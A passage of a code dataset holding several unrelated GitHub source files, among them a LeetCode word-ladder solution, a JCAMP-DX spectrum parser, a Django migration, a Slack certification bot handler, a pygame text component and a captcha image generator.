same.\n\"\"\"\nclass Solution:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n queue = collections.deque([beginWord])\n wordList = set(wordList)\n distance = 1\n while queue:\n size = len(queue)\n for i in range(size):\n cur = queue.popleft()\n if cur == endWord:\n return distance\n for j in range(len(cur)):\n for c in 'abcdefghijklmnopqrstuvwxyz':\n nextWord = cur[:j] + c + cur[j+1:]\n if nextWord in wordList:\n wordList.remove(nextWord)\n queue.append(nextWord)\n distance += 1\n return 0\n \n # store distance together with each word in the queue\n # this way, we do not need to visit nodes level by level in bfs\n def ladderLength(self, beginWord, endWord, wordList):\n wordList = set(wordList)\n queue = collections.deque([[beginWord, 1]])\n while queue:\n word, length = queue.popleft()\n if word == endWord:\n return length\n for i in range(len(word)):\n for c in 'abcdefghijklmnopqrstuvwxyz':\n next_word = word[:i] + c + word[i+1:]\n if next_word in wordList:\n wordList.remove(next_word)\n queue.append([next_word, length + 1])\n return 0\n \n # my solution 4 years ago. almost the same as solution 1 above but better readability\n def ladderLength(self, beginWord, endWord, wordList):\n \"\"\"\n :type beginWord: str\n :type endWord: str\n :type wordList: Set[str]\n :rtype: int\n \"\"\"\n toVisit = collections.deque([beginWord])\n \n distance = 1\n \n def addNextWords(curWord):\n for i in range(len(curWord)):\n for k in range(26):\n k = chr(ord('a')+k)\n nextWord = curWord[:i] + k + curWord[i+1:]\n if nextWord in wordList or nextWord == endWord:\n toVisit.appendleft(nextWord)\n wordList.discard(nextWord)\n \n \n while toVisit:\n curLevelSize = len(toVisit)\n \n for i in range(curLevelSize):\n word = toVisit.pop()\n if word == endWord:\n return distance\n \n addNextWords(word)\n \n distance += 1\n return 0\n","repo_name":"xiangcao/Leetcode","sub_path":"python_leetcode_2020/Python_Leetcode_2020/127_word_ladder.py","file_name":"127_word_ladder.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22310486373","text":"# -*- coding: UTF-8 -*-\n# See the LICENSE.rst file for licensing information.\n\nimport datetime\nfrom numpy import array, append, arange, logical_not, log10, nan\nimport re\nimport pdb\n\n'''\njcamp.py contains functions useful for parsing JCAMP-DX formatted files containing spectral data. The main\nfunction `jcamp_readfile()` formats the input file into a Python dictionary, while `jcamp_calc_xsec()`\nconverts a given JCAMP-style data dictionary from absorption units to cross-section (m^2).\n\nThe bottom of the file contains an example script, so that if the module is run by itself, it will show several\nspectra plotted from data in repository folders.\n'''\n\n__authors__ = 'Nathan Hagen'\n__license__ = 'MIT/X11 License'\n__contact__ = 'Nathan Hagen '\n__all__ = ['jcamp_readfile', '_parse_longdate', 'jcamp_read', 'jcamp_calc_xsec', 'is_float', 'get_value', 'jcamp_parse']\n__version__ = '1.2.2'\n\n## In SQZ_digits, '+' or '-' is for PAC, ',' for CSV.\nSQZ_digits = {'@':'+0', 'A':'+1', 'B':'+2', 'C':'+3', 'D':'+4', 'E':'+5', 'F':'+6', 'G':'+7', 'H':'+8', 'I':'+9',\n 'a':'-1', 'b':'-2', 'c':'-3', 'd':'-4', 'e':'-5', 'f':'-6', 'g':'-7', 'h':'-8', 'i':'-9',\n '+':'+', '-':'-', ',':' '}\nDIF_digits = {'%': 0, 'J':1, 'K':2, 'L':3, 'M':4, 'N':5, 'O':6, 'P':7, 'Q':8, 'R':9,\n 'j':-1, 'k':-2, 'l':-3, 'm':-4, 'n':-5, 'o':-6, 'p':-7, 'q':-8, 'r':-9}\nDUP_digits = {'S':1, 'T':2, 'U':3, 'V':4, 'W':5, 'X':6, 'Y':7, 'Z':8, 's':9}\n\n# The specification allows multiple formats for representing LONGDATE.\n# See `FRACTIONAL_SECONDS_PATTERN` below for the optional token representing fractional seconds.\n# These fractional seconds are removed in advance. Thus `%N` is not referenced in the formats below.\nDATE_FORMATS = [\"%Y/%m/%d %H:%M:%S %z\", \"%Y/%m/%d %H:%M:%S\", \"%Y/%m/%d\"]\n\n# The optional token describing the fractional seconds is referenced in the specification as `.SSSS`.\n# This number of digits (four) is rather unclear, since the usual presentation of a fraction of\n# seconds would contain either 3, 6 or 9 digits.\nFRACTIONAL_SECONDS_PATTERN = re.compile(\n r\"^\\d{4}/\\d{2}/\\d{2} +\\d{2}:\\d{2}\\d{2}(?P\\d{1,9})\"\n)\n\n##=====================================================================================================\ndef jcamp_readfile(filename):\n with open(filename, 'rb') as filehandle:\n data = jcamp_read(filehandle)\n data['filename'] = filename\n return(data)\n\n##=====================================================================================================\ndef _parse_longdate(date_string: str) -> datetime.datetime:\n \"\"\"parse the \"LONGDATE\" field according to the JCAMP-DX specification\n\n raises ValueError in case of problems\n \"\"\"\n fractional_seconds_match = FRACTIONAL_SECONDS_PATTERN.search(date_string)\n if fractional_seconds_match:\n # Remove the fractional seconds string - it would complicate `strptime`.\n date_string = FRACTIONAL_SECONDS_PATTERN.sub(\"\", date_string)\n\n # Try to interprete the fractional seconds. The JCAMP specification (v6.00) does not\n # explain, how a string of arbitrary length is supposed to be interpreted.\n # Thus we are just guessing based on the number of digits.\n fraction_seconds_string = fractional_seconds_match.group(\"fractional_seconds\")\n if len(fraction_seconds_string) in {7, 8, 9}:\n # this is probably nanoseconds\n microseconds = int(int(fraction_seconds_string) / 1000)\n elif len(fraction_seconds_string) in {4, 5, 6}:\n microseconds = int(fraction_seconds_string)\n elif len(fraction_seconds_string) in {1, 2, 3}:\n microseconds = 1000 * int(fraction_seconds_string)\n else:\n # We should never end up here.\n raise ValueError(\"Fractional seconds string could not be parsed: {}\".format(fraction_seconds_string))\n else:\n microseconds = 0\n\n # Parse the date and time.\n for fmt in DATE_FORMATS:\n try:\n parsed = datetime.datetime.strptime(date_string, fmt)\n except ValueError:\n pass\n else:\n # Inject the previously parsed microseconds\n return parsed.replace(microsecond=microseconds)\n else:\n raise ValueError(\"Failed to parse the date string: {}\".format(date_string))\n\n##=====================================================================================================\ndef jcamp_read(filehandle):\n '''\n Read a JDX-format file, and return a dictionary containing the header info, a 1D numpy vectors `x` for the\n abscissa information (e.g. wavelength or wavenumber) and `y` for the ordinate information (e.g. transmission).\n\n Parameters\n ----------\n filehandle : str\n The object representing the JCAMP-DX filename to read.\n\n Returns\n -------\n jcamp_dict : dict\n The dictionary containing the header and data vectors.\n '''\n\n jcamp_dict = {}\n xstart = []\n xnum = []\n y = []\n x = []\n datastart = False\n is_compound = False\n in_compound_block = False\n compound_block_contents = []\n re_num = re.compile(r'\\d+')\n lhs = None\n for line in filehandle:\n ## When parsing compound files, the input is an array of strings, so no need to decode it twice.\n if hasattr(line, 'decode'):\n line = line.decode('utf-8','ignore')\n\n if not line.strip():\n continue\n if line.startswith('$$'):\n continue\n\n ## Detect the start of a compound block\n if is_compound and line.upper().startswith('##TITLE'):\n in_compound_block = True\n compound_block_contents = [line]\n continue\n\n ## If we are reading a compound block, collect lines into an array to be processed by a\n ## recursive call this this function.\n if in_compound_block:\n ## Store this line.\n compound_block_contents.append(line)\n\n ## Detect the end of the compound block.\n if line.upper().startswith('##END'):\n ## Process the entire block and put it into the children array.\n jcamp_dict['children'].append(jcamp_read(compound_block_contents))\n in_compound_block = False\n compound_block_contents = []\n continue\n\n ## Lines beginning with '##' are header lines.\n if line.startswith('##'):\n line = line.strip('##')\n (lhs,rhs) = line.split('=', 1)\n lhs = lhs.strip().lower()\n rhs = rhs.strip()\n #continuation = rhs.endswith('=')\n\n if rhs.isdigit():\n jcamp_dict[lhs] = int(rhs)\n elif is_float(rhs):\n jcamp_dict[lhs] = float(rhs)\n else:\n jcamp_dict[lhs] = rhs\n\n ## Detect compound files.\n ## See table XI in http://www.jcamp-dx.org/protocols/dxir01.pdf\n if (lhs in {'data type', 'datatype'}) and (rhs.lower() == 'link'):\n is_compound = True\n jcamp_dict['children'] = []\n\n if (lhs in ('xydata', 'xypoints', 'peak table')):\n ## This is a new data entry, reset x and y.\n x = []\n y = []\n datastart = True\n datatype = rhs\n continue ## data starts on next line\n elif (lhs == 'end'):\n bounds = [int(i) for i in re_num.findall(rhs)]\n datastart = True\n datatype = bounds\n datalist = []\n continue\n elif lhs == 'longdate':\n try:\n parsed = _parse_longdate(jcamp_dict[lhs])\n except ValueError:\n # Keep the original date string.\n pass\n else:\n # Replace the string with the datetime object.\n jcamp_dict[lhs] = parsed\n elif datastart:\n datastart = False\n elif lhs is not None and not datastart: # multiline entry\n jcamp_dict[lhs] += '\\n{}'.format(line.strip())\n\n if datastart and (datatype == '(X++(Y..Y))'):\n ## If the line does not start with '##' or '$$' then it should be a data line.\n ## The pair of lines below involve regex splitting on floating point numbers and integers. We can't just\n ## split on spaces because JCAMP allows minus signs to replace spaces in the case of negative numbers.\n datavals = jcamp_parse(line)\n xstart.append(float(datavals[0]))\n xnum.append(len(datavals) - 1)\n for dataval in datavals[1:]:\n y.append(float(dataval))\n elif datastart and (('xypoints' in jcamp_dict) or ('xydata' in jcamp_dict)) and (datatype == '(XY..XY)'):\n datavals = [v.strip() for v in re.split(r\"[,;\\s]\", line) if v] ## be careful not to allow empty strings\n if not all(is_float(datavals)): continue\n datavals = array(datavals)\n x.extend(datavals[0::2]) ## every other data point starting at the zeroth\n y.extend(datavals[1::2]) ## every other data point starting at the first\n elif datastart and ('peak table' in jcamp_dict) and (datatype == '(XY..XY)'):\n datavals = [v.strip() for v in re.split(r\"[,;\\s]\", line) if v] ## be careful not to allow empty strings\n if not all(is_float(datavals)): continue\n datavals = array(datavals)\n x.extend(datavals[0::2]) ## every other data point starting at the zeroth\n y.extend(datavals[1::2]) ## every other data point starting at the first\n elif datastart and isinstance(datatype,list):\n ## If the line does not start with '##' or '$$' then it should be a data line.\n ## The pair of lines below involve regex splitting on floating point numbers and integers. We can't just\n ## split on spaces because JCAMP allows minus signs to replace spaces in the case of negative numbers.\n datavals = jcamp_parse(line)\n datalist += datavals\n\n if ('xydata' in jcamp_dict) and (jcamp_dict['xydata'] == '(X++(Y..Y))'):\n ## You got all of the Y-values. Next you need to figure out how to generate the missing X's...\n ## First look for the \"lastx\" dictionary entry. You will need that one to finish the set.\n xstart.append(jcamp_dict['lastx'])\n x = array([])\n for n in range(len(xnum)-1):\n dx = (xstart[n+1] - xstart[n]) / xnum[n]\n x = append(x, xstart[n]+(dx*arange(xnum[n])))\n #print(n, xstart[n], xstart[n+1], xnum[n], xstart[n]+(dx*arange(xnum[n])))\n\n ## The last line must be treated separately.\n if (xnum[len(xnum)-1] > 1):\n dx = (jcamp_dict['lastx'] - xstart[len(xnum)-1]) / (xnum[len(xnum)-1] - 1.0)\n x = append(x, xstart[len(xnum)-1]+(dx*arange(xnum[len(xnum)-1])))\n #print(n, xstart[len(xnum)-1]+(dx*arange(xnum[len(xnum)-1])))\n else:\n x = append(x, jcamp_dict['lastx'])\n\n y = array([float(yval) for yval in y])\n else:\n x = array([float(xval) for xval in x])\n y = array([float(yval) for yval in y])\n\n ## The \"xfactor\" and \"yfactor\" variables contain any scaling information that may need to be applied\n ## to the data. Go ahead and apply them.\n if ('xfactor' in jcamp_dict):\n x = x * jcamp_dict['xfactor']\n if ('yfactor' in jcamp_dict):\n y = y * jcamp_dict['yfactor']\n jcamp_dict['x'] = x\n jcamp_dict['y'] = y\n\n return(jcamp_dict)\n\n##=====================================================================================================\ndef jcamp_calc_xsec(jcamp_dict, wavemin=None, wavemax=None, skip_nonquant=True, debug=False):\n '''\n Taking as input a JDX file, extract the spectrum information and transform the absorption spectrum from existing\n units to absorption cross-section.\n\n This function also corrects for unphysical data (such as negative transmittance values, or transmission above\n 1.0), and calculates absorbance if transmittance given. Instead of a return value, the function inserts the\n information into the input dictionary.\n\n Note that the conversion assumes that the measurements were collected for gas at a temperature of 296K (23 degC).\n\n Parameters\n ----------\n jcamp_dict : dict\n A JCAMP spectrum dictionary.\n wavemin : float, optional\n The shortest wavelength in the spectrum to limit the calculation to.\n wavemax : float, optional\n The longest wavelength in the spectrum to limit the calculation to.\n skip_nonquant: bool\n If True then return \"None\" if the spectrum is missing quantitative data. If False, then try to fill in \\\n missing quantitative values with defaults.\n '''\n\n x = array(jcamp_dict['x']) ## use 'array' to force a copy so that we cannot change the original data\n y = array(jcamp_dict['y']) ## use 'array' to force a copy so that we cannot change the original data\n\n T = 296.0 ## the temperature (23 degC) used by NIST when collecting spectra\n R = 1.0355E-25 ## the constant for converting data (includes the gas constant)\n\n ## Note: normally when we convert from wavenumber to wavelength units, the ordinate must be nonuniformly\n ## rescaled in order to compensate. But this is only true if we resample the abscissa to a uniform sampling\n ## grid. In this case here, we keep the sampling grid nonuniform in wavelength space, such that each digital\n ## bin retains its proportionality to energy, which is what we want.\n if (jcamp_dict['xunits'].lower() in ('1/cm', 'cm-1', 'cm^-1')):\n jcamp_dict['wavenumbers'] = array(x) ## note that array() always performs a copy\n x = 10000.0 / x\n jcamp_dict['wavelengths'] = x\n elif (jcamp_dict['xunits'].lower() in ('micrometers', 'um', 'wavelength (um)')):\n jcamp_dict['wavelengths'] = x\n jcamp_dict['wavenumbers'] = 10000.0 / x\n elif (jcamp_dict['xunits'].lower() in ('nanometers', 'nm', 'wavelength (nm)')):\n x = x / 1000.0\n jcamp_dict['wavelengths'] = x\n jcamp_dict['wavenumbers'] = 10000.0 / x\n else:\n raise ValueError('Don\\'t know how to convert the spectrum\\'s x units (\"' + jcamp_dict['xunits'] + '\") to micrometers.')\n\n ## Correct for any unphysical negative values.\n y[y < 0.0] = 0.0\n\n ## Make sure \"y\" refers to absorbance.\n if (jcamp_dict['yunits'].lower() == 'transmittance'):\n ## If in transmittance, then any y > 1.0 are unphysical.\n y[y > 1.0] = 1.0\n\n ## Convert to absorbance.\n okay = (y > 0.0)\n y[okay] = log10(1.0 / y[okay])\n y[logical_not(okay)] = nan\n\n jcamp_dict['absorbance'] = y\n elif (jcamp_dict['yunits'].lower() == 'absorbance'):\n pass\n elif (jcamp_dict['yunits'].lower() == '(micromol/mol)-1m-1 (base 10)'):\n jcamp_dict['yunits'] = 'xsec (m^2))'\n jcamp_dict['xsec'] = y / 2.687e19\n return\n else:\n raise ValueError('Don\\'t know how to convert the spectrum\\'s y units (\"' + jcamp_dict['yunits'] + '\") to absorbance.')\n\n ## Determine the effective path length \"ell\" of the measurement chamber, in meters.\n if ('path length' in jcamp_dict):\n (val,unit) = jcamp_dict['path length'].lower().split()[0:2]\n if (unit == 'cm'):\n ell = float(val) / 100.0\n elif (unit == 'm'):\n ell = float(val)\n elif (unit == 'mm'):\n ell = float(val) / 1000.0\n else:\n ell = 0.1\n else:\n if skip_nonquant: return({'info':None, 'x':None, 'xsec':None, 'y':None})\n ell = 0.1\n if debug: print('Path length variable not found. Using 0.1m as a default ...')\n\n assert(len(x) == len(y))\n\n if ('npoints' in jcamp_dict):\n if (len(x) != jcamp_dict['npoints']):\n npts_retrieved = str(len(x))\n msg = '\"' + jcamp_dict['title'] + '\": Number of data points retrieved (' + npts_retrieved + \\\n ') does not equal the expected length (npoints = ' + str(jcamp_dict['npoints']) + ')!'\n raise ValueError(msg)\n\n ## For each gas, manually define the pressure \"p\" at which the measurement was taken (in units of mmHg).\n ## These values are obtained from the NIST Infrared spectrum database, which for some reason did not\n ## put the partial pressure information into the header.\n if ('partial_pressure' in jcamp_dict):\n p = float(jcamp_dict['partial_pressure'].split()[0])\n p_units = jcamp_dict['partial_pressure'].split()[1]\n if (p_units.lower() == 'mmhg'):\n pass\n elif (p_units.lower() == 'ppm'):\n p = p * 759.8 * 1.0E-6 ## scale PPM units at atmospheric pressure to partial pressure in mmHg\n else:\n if debug: print('Partial pressure variable value for ' + jcamp_dict['title'] + ' is missing. Using the default p = 150.0 mmHg ...')\n if skip_nonquant: return({'info':None, 'x':None, 'xsec':None, 'y':None})\n p = 150.0\n\n ## Convert the absorbance units to cross-section in meters squared per molecule.\n xsec = y * T * R / (p * ell)\n\n ## Add the \"xsec\" values to the data dictionary.\n jcamp_dict['xsec'] = xsec\n\n return\n\n##=====================================================================================================\ndef is_float(s):\n '''\n Test if a string, or list of strings, contains a numeric value(s).\n\n Parameters\n ----------\n s : str, or list of str\n The string or list of strings to test.\n\n Returns\n -------\n is_float_bool : bool or list of bool\n A single boolean or list of boolean values indicating whether each input can be converted into a float.\n '''\n\n if isinstance(s,tuple) or isinstance(s,list):\n if not all(isinstance(i, str) for i in s):\n raise TypeError(\"Input {} is not a list of strings\".format(s))\n if (len(s) == 0):\n raise ValueError('Input {} is empty'.format(s))\n else:\n bool = list(True for i in range(0,len(s)))\n for i in range(0,len(s)):\n try:\n float(s[i])\n except ValueError:\n bool[i] = False\n return(bool)\n else:\n if not isinstance(s, str):\n raise TypeError(\"Input '%s' is not a string\" % (s))\n\n try:\n float(s)\n return(True)\n except ValueError:\n return(False)\n\n##=====================================================================================================\ndef get_value(num, is_dif, vals):\n n = float(num)\n if is_dif:\n lastval = vals[-1]\n val = n + lastval\n else:\n val = n\n\n return(val)\n\n##=====================================================================================================\ndef jcamp_parse(line):\n line = line.strip()\n\n datavals = []\n num = \"\"\n\n ## Convert whitespace into single space by splitting the string then re-assembling with single spaces.\n line = ' '.join(line.split())\n\n ## If there are any coded digits, then replace the codes with the appropriate numbers.\n ## 'DUP_digits' are characters that represent how many times the previous character should be replicated.\n ## 'DIF_digits' represent ...?\n ## 'SQZ_digits' represent ...?\n DUP_set = set(DUP_digits)\n\n if any(c in DUP_set for c in line):\n ## Split the line into individual characters so that you can check for coded characters one-by-one.\n newline = ''\n for (i,c) in enumerate(line):\n if (c in DUP_digits):\n prev_c = line[i-1]\n mul = DUP_digits[c]\n newline += prev_c * (mul-1)\n else:\n mul = ''\n newline += c\n line = \"\".join(newline)\n\n DIF = False\n for c in line:\n if c.isdigit() or (c == \".\"):\n num += c\n elif (c == ' '):\n DIF = False\n if num:\n n = get_value(num, DIF, datavals)\n datavals.append(n)\n num = ''\n elif (c in SQZ_digits):\n DIF = False\n if num:\n n = get_value(num, DIF, datavals)\n datavals.append(n)\n num = SQZ_digits[c]\n elif (c in DIF_digits):\n if num:\n n = get_value(num, DIF, datavals)\n datavals.append(n)\n DIF = True\n num = str(DIF_digits[c])\n else:\n raise Exception(\"Unknown character (%s) encountered while parsing data\" % c)\n\n if num:\n n = get_value(num, DIF, datavals)\n datavals.append(n)\n\n return(datavals)\n\n## =================================================================================================\n## =================================================================================================\n\nif (__name__ == '__main__'):\n import matplotlib.pyplot as plt\n filename = './data/infrared_spectra/ethylene.jdx'\n jcamp_dict = jcamp_readfile(filename)\n plt.plot(jcamp_dict['x'], jcamp_dict['y'])\n plt.title(filename)\n plt.xlabel(jcamp_dict['xunits'])\n plt.ylabel(jcamp_dict['yunits'])\n\n jcamp_calc_xsec(jcamp_dict, skip_nonquant=False, debug=False)\n plt.figure()\n plt.plot(jcamp_dict['wavelengths'], jcamp_dict['xsec'])\n plt.title(filename)\n plt.xlabel('wavelength (um)')\n plt.ylabel('absorption cross-section (m^2)')\n\n filename = './data/uvvis_spectra/toluene.jdx'\n plt.figure()\n jcamp_dict = jcamp_readfile(filename)\n plt.plot(jcamp_dict['x'], jcamp_dict['y'], 'r-')\n plt.title(filename)\n plt.xlabel(jcamp_dict['xunits'])\n plt.ylabel(jcamp_dict['yunits'])\n\n filename = './data/mass_spectra/ethanol_ms.jdx'\n jcamp_dict = jcamp_readfile(filename)\n plt.figure()\n for n in arange(len(jcamp_dict['x'])):\n plt.plot((jcamp_dict['x'][n],jcamp_dict['x'][n]), (0.0, jcamp_dict['y'][n]), 'm-', linewidth=2.0)\n plt.title(filename)\n plt.xlabel(jcamp_dict['xunits'])\n plt.ylabel(jcamp_dict['yunits'])\n\n filename = './data/raman_spectra/tannic_acid.jdx'\n jcamp_dict = jcamp_readfile(filename)\n plt.figure()\n plt.plot(jcamp_dict['x'], jcamp_dict['y'], 'k-')\n plt.title(filename)\n plt.xlabel(jcamp_dict['xunits'])\n plt.ylabel(jcamp_dict['yunits'])\n\n filename = './data/neutron_scattering_spectra/emodine.jdx'\n jcamp_dict = jcamp_readfile(filename)\n plt.figure()\n plt.plot(jcamp_dict['x'], jcamp_dict['y'], 'k-')\n plt.title(filename)\n plt.xlabel(jcamp_dict['xunits'])\n plt.ylabel(jcamp_dict['yunits'])\n\n filename = './data/infrared_spectra/example_compound_file.jdx'\n jcamp_dict = jcamp_readfile(filename)\n plt.figure()\n for c in jcamp_dict['children']:\n plt.plot(c['x'], c['y'])\n plt.xlabel(jcamp_dict['children'][0]['xunits']) ## assume all blocks have the same units\n plt.ylabel(jcamp_dict['children'][0]['yunits'])\n plt.title(filename)\n\n filename = './data/infrared_spectra/example_multiline_datasets.jdx'\n jcamp_dict = jcamp_readfile(filename)\n plt.figure()\n plt.plot(jcamp_dict['x'], jcamp_dict['y'])\n plt.title(filename)\n plt.xlabel(jcamp_dict['xunits'])\n plt.ylabel(jcamp_dict['yunits'])\n print(jcamp_dict['comments'])\n\n plt.show()\n","repo_name":"nzhagen/jcamp","sub_path":"jcamp.py","file_name":"jcamp.py","file_ext":"py","file_size_in_byte":23513,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"19"} +{"seq_id":"21674045990","text":"\"\"\"\n @author: HimanshuMittal01\n @organization: ripiktech\n\"\"\"\n\nfrom typing import Dict, Any\n\nimport pandas as pd\n\nfrom optimus.metrics._core import Metric\nfrom optimus.utils.views import view_by_product\nfrom optimus.machines.machine import Machine\n\n\nclass TotalCompletionTime(Metric):\n def __init__(self):\n super().__init__(name=\"total_completion_time\", maximise=False)\n\n def __call__(\n self,\n machines: Dict[str, Machine] = None,\n product_view: pd.DataFrame = None,\n *args,\n **kwargs\n ):\n if product_view is None:\n product_view = view_by_product(machines=machines)\n\n total_value = product_view[\"rel_end_time\"].max()\n return total_value\n","repo_name":"Vishruth-N/Ripik_Test","sub_path":"optimus/metrics/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33043164121","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nimport uimg.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='UserImage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('image', models.ImageField(upload_to=uimg.models.get_user_image_path, verbose_name=b'\\xd0\\x98\\xd0\\xb7\\xd0\\xbe\\xd0\\xb1\\xd1\\x80\\xd0\\xb0\\xd0\\xb6\\xd0\\xb5\\xd0\\xbd\\xd0\\xb8\\xd0\\xb5')),\n ('date', models.DateTimeField(default=datetime.datetime(2015, 6, 11, 15, 25, 9, 540983), verbose_name=b'\\xd0\\x94\\xd0\\xb0\\xd1\\x82\\xd0\\xb0')),\n ('desc', models.TextField(default=b'', max_length=250, null=True, verbose_name=b'\\xd0\\x9e\\xd0\\xbf\\xd0\\xb8\\xd1\\x81\\xd0\\xb0\\xd0\\xbd\\xd0\\xb8\\xd0\\xb5', blank=True)),\n ],\n options={\n 'verbose_name': '\\u0418\\u0437\\u043e\\u0431\\u0440\\u0430\\u0436\\u0435\\u043d\\u0438\\u0435',\n 'verbose_name_plural': '\\u0418\\u0437\\u043e\\u0431\\u0440\\u0430\\u0436\\u0435\\u043d\\u0438\\u044f',\n },\n ),\n ]\n","repo_name":"loobinsk/newprj","sub_path":"uimg/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26079725207","text":"import json\nimport logging\nimport re\nimport requests\nimport urllib\nfrom certification_management.business import Level\nfrom certification_management.business import User\nfrom certification_management.business import UserCertification\nfrom certification_management.business import Voucher\nfrom utils.configuration import Configuration\n\n\nclass CertibotEvents:\n def __init__(self, environment):\n # Logging configuration\n logging.basicConfig()\n self.logger = logging.getLogger()\n self.logger.setLevel(logging.INFO)\n\n self.environment = environment\n\n def launch(self, event):\n # Manage 'challenge' from Slack to validate the lambda.\n if \"challenge\" in event:\n return event[\"challenge\"]\n\n slack_event = event['event']\n\n # Ignore message from bot.\n if not \"bot_id\" in slack_event \\\n and slack_event['type'] == 'user_change' \\\n and 'XfELFP2WL9' in slack_event['user']['profile']['fields']:\n\n # Application configuration\n config = Configuration(self.logger, self.environment)\n\n # Check input token\n if not event['token'] in config.slack_event_token:\n return \"403 Forbidden\"\n\n self.logger.info(slack_event['user']['real_name'] + \" gets \" + slack_event['user']['profile']['fields']['XfELFP2WL9']['value'] + \" certification!\")\n\n user_udid = slack_event['user']['id']\n user_level_name = re.search(' \\((.+?) level\\)', slack_event['user']['profile']['fields']['XfELFP2WL9']['value'].lower()).group(1)\n\n user = User.get(user_udid)\n level = Level.getByName(user_level_name)\n\n if user and level:\n for user_certification in user.user_certifications:\n user_certification.passesCertification(level)\n\n return \"200 OK\"\n","repo_name":"axel-springer-kugawana/gtt_certibot","sub_path":"lambda/certification_management/certibot_events.py","file_name":"certibot_events.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"33086187975","text":"\"\"\"\nClasses:\n - TextComponent\n\"\"\"\n\nfrom time import time\nfrom math import floor\nfrom pygame.font import Font\nfrom pygame import Surface, event\nfrom source.core.component import Component\nfrom source.core.tools import Position\n\n\nclass TextComponent(Component):\n \"\"\"\n A component used to display text.\n \"\"\"\n def __init__(self, font: str, size: int, color: tuple[int, int, int], render_position: Position, render_width: int, render_height: int, animated: bool = False, speed: float = 1.0) -> None:\n \"\"\"\n :param font: The path of the font used.\n :param size: The size of the font.\n :param color: The color of the text.\n :param render_position: The position of the text box.\n :param render_width: The width of the text box.\n :param render_height: The height of the text box.\n :param animated: True if the text needs to appear in an animated way.\n :param speed: If `animated=True`, sets the speed of apparition of the text.\n \"\"\"\n super().__init__(render_position, render_width, render_height)\n\n self.font = Font(font, size)\n self.color = color\n self.lines: list[str] = []\n self.rendered_lines: list[Surface] = []\n\n self.animated = animated\n self.current_lines: list[str] = []\n self.speed = speed\n self.apparition_time = -1\n\n def set_text(self, lines: list[str]) -> None:\n \"\"\" Change the text to display.\n\n :param lines: The lines of text which will be displayed.\n \"\"\"\n self.lines = lines\n\n if not self.animated:\n self.pre_render()\n else:\n self.current_lines = []\n self.apparition_time = -1\n\n def set_color(self, color: tuple[int, int, int]) -> None:\n \"\"\" Changes the color of the text.\n\n :param color: The color of the text.\n \"\"\"\n self.color = color\n self.pre_render()\n\n def pre_render(self) -> None:\n \"\"\"\n Renders the text to a buffer.\n \"\"\"\n self.rendered_lines = []\n for line in self.lines:\n self.rendered_lines.append(self.font.render(line, False, self.color))\n\n def update(self, events: list[event.Event]) -> None:\n \"\"\" Updates the text display.\n\n :param events: A list of the lastly pulled events.\n \"\"\"\n pass\n\n def render(self, surface: Surface) -> None:\n \"\"\" Renders the text to the specified surface.\n\n :param surface: The surface on which to render the text.\n \"\"\"\n if self.animated and self.current_lines != self.lines:\n if self.apparition_time == -1:\n self.apparition_time = time()\n self.current_lines = [\"\" for _ in range(len(self.lines))]\n\n amount = floor((time() - self.apparition_time) * self.speed)\n for i in range(len(self.lines)):\n if amount >= len(self.lines[i]):\n self.current_lines[i] = self.lines[i]\n amount -= len(self.lines[i])\n else:\n self.current_lines[i] = self.lines[i][:amount]\n break\n\n self.rendered_lines = []\n for line in self.current_lines:\n self.rendered_lines.append(self.font.render(line, False, self.color))\n\n offset = self.render_position.y + (self.render_height - (sum([line.get_height() + 16 for line in self.rendered_lines]) - 16)) / 2\n for line in self.rendered_lines:\n surface.blit(line, (self.render_position.x + (self.render_width - line.get_width()) / 2, offset))\n offset += line.get_height() + 16\n","repo_name":"L0UARN/boring-dungeon","sub_path":"source/ui/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"28821679960","text":"from captcha.image import ImageCaptcha\nfrom gen_image import __gen_random_captcha_text\nfrom config import MAX_CAPTCHA\n\ndef creat_image():\n a = 0\n while a < 100:\n i = str(a)\n image = ImageCaptcha(width=160, height=60, font_sizes=[35])\n text = __gen_random_captcha_text(size=MAX_CAPTCHA)\n image.write(text,\"./image/\"+ i +\".png\")\n a += 1\n\nif __name__ == '__main__':\n creat_image()\n","repo_name":"barnett1995/CNN_captcha","sub_path":"gen_captcha/gen_test_image.py","file_name":"gen_test_image.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"70836195564","text":"import math\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.init as init\nimport torch.nn.functional as F\nfrom torch import Tensor\n\nclass SparseDropout(nn.Module):\n def __init__(self, p):\n super().__init__()\n self.p = p\n\n def forward(self, input):\n input_coal = input.coalesce()\n drop_val = F.dropout(input_coal._values(), self.p, self.training)\n return torch.sparse.FloatTensor(input_coal._indices(), drop_val, input.shape)\n\nclass MixedDropout(nn.Module):\n def __init__(self, p):\n super().__init__()\n self.dense_dropout = nn.Dropout(p)\n self.sparse_dropout = SparseDropout(p)\n\n def forward(self, input):\n if input.is_sparse:\n return self.sparse_dropout(input)\n else:\n return self.dense_dropout(input)\n\nclass BackwardLinear(nn.Module):\n __constants__ = ['in_features', 'out_features']\n in_features: int\n out_features: int\n weight: Tensor\n\n def __init__(self, in_features, out_features, bias):\n super(BackwardLinear, self).__init__()\n self.weight = nn.Parameter(torch.FloatTensor(in_features, out_features))\n if bias:\n self.bias = 